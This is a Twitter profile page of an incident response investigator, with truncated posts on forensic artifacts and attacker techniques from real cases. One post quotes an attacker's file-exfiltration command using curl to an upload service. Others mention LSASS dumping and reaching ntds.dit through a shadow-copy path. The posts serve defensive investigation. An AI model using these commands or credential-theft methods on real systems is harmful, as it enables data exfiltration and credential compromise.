Stephan Berger (@malmoeb)'s Twitter Profile

Stephan Berger
@malmoeb
Head of Investigations @InfoGuardAG
infosec.exchange/@malmoeb
ID: 910694455
Link: https://dfir.ch/
Joined: 28-10-2012 16:57:26

2,2K Tweets
26,26K Followers
1,1K Following

Stephan Berger (@malmoeb):

This might come in handy as an "Evidence of Execution" artifact, although I'm not sure when exactly DCOM will log this entry (example below from a recent case, showcasing the execution of Advanced IP Scanner by the attacker): Source: Microsoft-Windows-DistributedCOM Event ID:

Stephan Berger (@malmoeb):

This might be a niche persistence mechanism, but during an investigation, I stumbled upon the following file on a Linux server: /home/<user>/.config/autostart/set_trusted.desktop With the following content: [Desktop Entry] Encoding=UTF-8 Exec=/usr/bin/set_trusted.sh Name=Set

Stephan Berger (@malmoeb):

I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed). The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process

Stephan Berger (@malmoeb):

As I'm about to present about Linux Rootkits at the 10th edition of EuskalHack (🎉), here’s a nifty trick to detect a userland rootkit that tries to hide its presence by blocking access to /etc/ld.so.preload. We are mounting the filesystem with debugfs (an interactive file

Stephan Berger (@malmoeb):

If I were to start a new job at a company, and if I had one (security-related) wish... If I could pick anything, I’d ask for a clear naming convention for all computers and servers. Additionally, I’d want DHCP and security logs to be stored centrally in a SIEM system. That way,

Stephan Berger (@malmoeb):

During various Ivanti Endpoint Manager Mobile investigations (CVE-2025-4428), we (as others in our field) saw that the threat actors dumped heap memory from the Tomcat Java processes using jcmd, in order to search the dumped data for sensitive information. Have others seen this

Stephan Berger (@malmoeb):

The screenshot below is from a recent Incident Response case, investigated by my colleague Flo Scheiber. The user "printer" suddenly sprang to life because an attacker brute-forced the VPN login (without Multi-Factor Authentication). This was not the first time a "printer"

Stephan Berger (@malmoeb):

An attacker downloaded a freely available webshell from GitHub and stored it under the installation path of the legitimate SAP installation in the recent SAP Visual Composer exploitation, "disguised" as a PHPMyAdmin file (see image). The code itself is relatively simple,

LETHAL FORENSICS (@lethal_dfir):

We just released MemProcFS-Analyzer v1.2.0 with various enhancements. Check out the changelog for more information. Happy Memory Analysis! #MemProcFS #MemoryAnalysis #DFIR github.com/LETHAL-FORENSI…

Stephan Berger (@malmoeb):

A teammate of mine worked on an interesting incident where the attackers connected to the backup server via RDP, launched the Chrome browser, and searched on Google for "VirtualBox". The VirtualBox installer was then downloaded to the home directory of the compromised user:

Stephan Berger (@malmoeb):

Yesterday, I presented "Anti-Forensic" techniques for Windows and Linux at the Troopers conference in Heidelberg. This morning at breakfast, I was approached by an attendee and asked if I had looked at the zapper tool from The Hacker's Choice. [1] I said no, but of course, my

Stephan Berger (@malmoeb):

🛬👨‍🏫🛫🔁 I love being a speaker. I also love meeting people, hearing their thoughts, and exchanging ideas. While I was enjoying tapas in the charming old town of Donostia-San Sebastián, I had a lengthy conversation with an elderly gentleman from Glasgow. One of his statements

Stephan Berger (@malmoeb):

Remote Connection from 30.1.40[.]64 😱 or not 🤔 After a second look, it turned out that the customer is using a public IP addressing scheme for internal hosts 🙊 As somebody wrote on the Cisco forum: "Such addressing scheme looks really messy for me, but maybe there are

Stephan Berger (@malmoeb):

Ever heard of shellbags? Like in the example here: My Computer -> ? -> Users -> <compromised_user> -> ADRecon-Report-20250225235831 Shellbags are a subset of data found within UsrClass.dat and sometimes in the NTUSER.DAT hive. They are used by Windows to remember folder view

Stephan Berger (@malmoeb):

During a recent incident response case, we observed the following file access:
\\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit

This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot. Many EDR and detection systems typically monitor for commands

Stephan Berger (@malmoeb):

In a recent incident response case, threat actors escalated from a compromised Ivanti appliance to full Domain Admin privileges in under eight minutes (..!). Once the backdoor was successfully deployed on the Ivanti appliance, the threat actors leveraged their access to request

Stephan Berger (@malmoeb):

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command:
curl bashupload[.]com -T your_file.txt

Notably, Palo Alto highlighted this service in a February

Stephan Berger (@malmoeb):

Dear attacker, Clear-History does not clear the PSReadLine command history file. Clear-History, as taken from the official documentation, deletes only entries from the PowerShell session command history. In contrast, the PSReadLine module stores a history file that contains

Stephan Berger (@malmoeb):

What I learnt today: When NetScan is executed with the ‘Check for write access’ option enabled, a ‘delete[.]me’ file is created then deleted on discovered shares. [1] Thanks, The DFIR Report - this is exactly what we are seeing in a recent case. I owe you one 🍻 [1]

Stephan Berger (@malmoeb):

Awesome read & technique - well done 👏 "In this blog post, we talked about how a well-known technique for endpoint persistence can be re-invented in a cloud environment"